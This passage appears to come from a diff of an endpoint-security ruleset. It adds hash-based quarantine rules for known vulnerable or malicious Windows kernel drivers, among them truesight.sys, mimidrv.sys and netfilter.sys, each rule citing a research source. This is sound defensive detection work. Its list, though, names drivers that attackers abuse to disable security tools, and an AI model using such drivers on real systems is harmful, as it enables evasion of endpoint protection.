"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827889Z", + "creation_date": "2026-03-23T11:45:31.827891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827897Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "218a7f2c0c645745a0f8b6df1ff52d61febe127cd7a33d7f163dda98d133745f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4174591-f45d-59c9-8292-78188af15801", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828685Z", + "creation_date": "2026-03-23T11:45:30.828687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a3642c31fafc524b24c8ac692913df6ce0548efeca06fb369dc10bb9a95949d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b41e7709-111d-5c2f-81d5-5d5736f616a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973501Z", + "creation_date": "2026-03-23T11:45:29.973503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.973508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c1251784e6f61525d0082882a969cb8a0c5d5359be22f5a73e3b0cd38b51687", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b431e3fb-ee12-5c58-afd1-0fac1005d337", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473748Z", + "creation_date": "2026-03-23T11:45:30.473751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f7c6346a25d465fbc06c41d841e6a5c7645545448db88793ab29d8e5637fae5", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b437c67d-c183-561c-9f08-ec70d8be090c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826350Z", + "creation_date": "2026-03-23T11:45:31.826352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed24e54cc6b6954987ba052764ed936ce6cc6644b05ad909b1378142e7c1090d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b44d9faa-4eae-5294-8e2c-3004d0c8609e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142928Z", + "creation_date": "2026-03-23T11:45:31.142930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"aa5badc3f69d4d48396dc76bf4ae78def57fbda2d459d9365db64da6963bb2e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b476bf47-5860-557e-9669-282d388d7a90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479437Z", + "creation_date": "2026-03-23T11:45:31.479442Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a96d43d06fe7e9ddaf6206965b66611d24bb77341a9f0ec29ae9914bf486e8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b48976aa-b9f2-5c04-ba88-d780c7e7ddd4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479618Z", + "creation_date": "2026-03-23T11:45:30.479620Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bed4285d0f8d18f17ddaa53a98a475c87c04c4d167499e24c770da788e5d45f4", + "comment": "Malicious Kernel Driver (aka be6318413160e589080df02bb3ca6e6a.sys) [https://www.loldrivers.io/drivers/a9ab4412-d484-459b-be97-5975f5ab8094/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4b64ef1-69c0-5715-b9ee-dab23b1ae135", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973287Z", + "creation_date": "2026-03-23T11:45:29.973289Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "262268f21c789c2bdaf1950b556456a9a5114ed5759d806200b0cec107bf76d7", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] 
[https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4b6f415-60cd-5915-9949-b839668e1aeb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967494Z", + "creation_date": "2026-03-23T11:45:29.967496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb8e536680732b474a5c26970ace2087667622caa3dd82c1c56731a7c5a1c8ce", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4c5a55a-a4c8-5d40-8630-7540768cbf1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150721Z", + "creation_date": "2026-03-23T11:45:31.150723Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0dd599393c689718f83fc63b98cf42bc62ea27cbd5c9993e845019464e9cc20", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4d7d834-ba5b-56b4-886b-2891dbb37384", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810219Z", + "creation_date": "2026-03-23T11:45:31.810221Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf3a7dee3a5dcbc237cc2015a0e23a97306f914e502e98d9fcb45af3ddbdef64", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b4de0662-096d-59f6-a3c2-1035309217ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459300Z", + "creation_date": "2026-03-23T11:45:30.459303Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459312Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9dbc2a37f53507296cc912e7d354dab4e55541ba821561aa84f74d1bd8346be2", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4fe044a-e17d-514e-a60b-908a72a16f8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621938Z", + "creation_date": "2026-03-23T11:45:29.621947Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621956Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54231728c29f2d2003ec575729760369bb72be7b656b52b4f02ec198f4ee4dfd", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b504f00d-92f0-5356-9d5b-a684baec31ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832242Z", + "creation_date": "2026-03-23T11:45:30.832245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78cb9665367af9bb8e1c49ce7c64fc56f2c9580c4781a2d09bbceaa23f9f130b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5244573-846b-5ca5-ad22-5ab9340253bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495653Z", + "creation_date": "2026-03-23T11:45:31.495655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "034eb20c8e0409eee548de31e50388ade722fcb2137314d0bbee8e5d5cb0339e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b52d12a0-e5f8-5a1b-99ca-cb2a154bfa94", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463013Z", + "creation_date": "2026-03-23T11:45:30.463016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b538652b-7c06-56b3-b096-4a34dc9678c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817933Z", + "creation_date": "2026-03-23T11:45:30.817935Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70afdc0e11db840d5367afe53c35d9642c1cf616c7832ab283781d085988e505", + "comment": "Vulnerable Kernel Driver (aka stdcdrvws64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b54b7cd4-1b8a-52ae-ac14-fde3a4e528dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.980855Z", + "creation_date": "2026-03-23T11:45:29.980857Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980862Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0e583bd88eb198558442f69a8bbfc96f4c5c297befea295138cfd2070f745c5", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b54f9446-26de-56b2-bafb-b8577d4be1ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151038Z", + "creation_date": "2026-03-23T11:45:31.151040Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f56ccd1a839000a76a839ed9f03ff5778951890eb1fe13c5fcdb2540ed558ae3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "b55286d1-6392-5956-921a-2091f976c8a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980447Z", + "creation_date": "2026-03-23T11:45:29.980449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b547368c03e0a584ae3c5e62af3728426c68b316a15f3290316844d193ad182", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b553a1f9-0ece-5f38-ab3d-d3e8e62fe043", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155014Z", + "creation_date": "2026-03-23T11:45:31.155016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155021Z", 
+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a19128fb0894e5f0f70e24b651007d33a51d430b1ff8ee77cdcb17b925ce95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5612782-d39b-59c1-98bb-ba9bb525c065", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828988Z", + "creation_date": "2026-03-23T11:45:31.828991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e753d1cc0ee358578b604144b918f287f1127da9cebfdbf167ee649d7534fda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5690161-c80f-5802-a8df-247f29f8a9d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143416Z", + "creation_date": "2026-03-23T11:45:31.143418Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143423Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a81d5126c51d64cd3f6ead91efa079fc877d6cad2e69de1c37fc1be29984d50", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b586c611-c482-5ed5-bb27-8cf326ac17eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614351Z", + "creation_date": "2026-03-23T11:45:29.614352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614358Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
